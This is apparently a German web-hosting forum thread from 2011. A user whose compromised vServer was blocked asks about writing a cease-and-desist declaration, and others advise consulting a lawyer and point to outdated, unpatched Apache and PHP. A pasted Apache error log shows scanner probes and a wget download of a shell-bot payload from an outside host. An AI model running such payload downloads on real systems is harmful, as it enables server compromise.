Unterlassungserklärung

nappel4life · 4. Mai 2011

Nachdem mein Vserver gesperrt wurde, soll ich jetzt eine Unterlassungserklärung schreiben. Hat jemand eine Vorlage für mich? Ich möchte aber auch keine Allgemeine schreiben, die gleich alles abdeckt, bin ja nicht doof
Abgesehen davon ist es meine erste Unterlassungserklärung in all den Jahren in denen ich einen Linux-Server besitze.

Da es sich um einen Bug in Apache2 handelte, sollte sich die Erklärung auch auf diesem bzw. in dieser Richtung beziehen.

Hoffe ihr könnt mir helfen

PS: Checkt mal eure Apache2 logs

Proyx · 4. Mai 2011

Was hattest du einen Indianer der offen war bzw als Proxy lief
Informationen wäre ganz nett

Naja du musst in etwa schreiben ,dass du es in Zukunft sein lässt und es zu verhindern weißt.(Für genauere Informationen frage den Anwalt deines Vertrauens)

Naja hier hast du ein Muster

nappel4life · 4. Mai 2011

Einen Indianer der anscheinend offen war. Es wurde ein Stealth shell bot geladen.
Hier meine error.log
[Mon May 02 11:29:41 2011] [notice] Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 configured -- resuming normal operations
[Mon May 02 13:45:14 2011] [error] [client 93.90.177.140] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon May 02 19:45:38 2011] [error] [client 69.162.74.102] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Tue May 03 07:07:47 2011] [error] [client 89.238.185.114] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/w00tw00t.at.blackhats.romanian.anti-sec:)
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/phpMyAdmin
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/pma
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/myadmin
[Tue May 03 20:18:55 2011] [error] [client 91.121.159.201] File does not exist: /var/www/MyAdmin
rm: cannot remove `fail2ban.sock': Operation not permitted
--20:23:21-- http://czech.altervista.org/sorin
=> `sorin'
Resolving czech.altervista.org... 46.4.73.74
Connecting to czech.altervista.org|46.4.73.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,643 (28K) [text/plain]

0K .......... .......... ....... 100% 3.35 MB/s

20:23:21 (3.35 MB/s) - `sorin' saved [28643/28643]

[netcup] Felix P. · 4. Mai 2011

Beratung in rechtlichen Fragen darf nur ein zugelassener Rechtsanwalt geben. Wir bitten dieses zu beachten.

Proyx · 4. Mai 2011

Naja das mit der UE sollte geklärt sein mach am Beste ein neues Thema auf für die uralt Shell

nappel4life · 4. Mai 2011

Ohman, heisst das ich soll mir jetzt einen Anwalt hinzuziehen wegen so einer Erklärung?
Was passiert wenn ich keine abgebe und den Server kündige und diesen gesperrt lasse?
Traffic hat er ja laut VCP nicht wirklich verursacht.
Werde auch keinen Indianer vorerst installieren, brauch ich nicht wirklich atm.

[netcup] Felix P. · 4. Mai 2011

Nein, einen Anwalt muss man nicht einschalten. Das muss man halt selber entscheiden, ob einem das wichtig ist. Es darf hier nur niemand dazu Beratung geben, sollte er kein zugelassener Anwalt sein.

Zu Ihrer eigenen Sicherheit sollten Sie auch bei einer Kündigung eine Stellungsnahme abgeben. Kommt es zu Ermittlungen der Justiz kann so Zeit und letztendlich für Sie Geld gespart werden. Es ist immer gut, wenn man diesen direkt Fakten liefern kann.

Elradon · 5. Mai 2011

Unterlassungserklärungen gehören neben AGB zu den Dingern, die man am besten nicht selbst verfasst. Bei Unterlassungserklärungen kommt man vor allem nicht mehr so leicht wieder heraus. Um es überspitzt zu formulieren: durch die falsche Wortwahl verpflichtet man sich nachher noch gar kein Internet mehr zu benutzen - oder realistischer keinen Server mehr zu betreiben.
Ich kenns dabei allerdings nur so, dass man eine zu unterscheibende Unterlassungserklärung vorgelegt bekommt und diese dann am besten von seinem eigenen Anwalt im und zum eigenen Interesse überarbeiten lässt.

vmk · 5. Mai 2011

Zitat von nappel4life;34232

Da es sich um einen Bug in Apache2 handelte
[...]
PS: Checkt mal eure Apache2 logs
[...]
[Mon May 02 11:29:41 2011] [notice] Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 configured -- resuming normal operations

Sowohl Apache als auch PHP sind von 2006. Dafür gibt es sicherlich schon länger keine Sicherheitspatches. Honeypot? Ansonsten sicherlich 'ne nette Prüfungsfrage wo man sehen kann ob sich der Betreiber überhaupt ansatzweise Gedanken um Sicherheit macht (falls das System online sein sollte).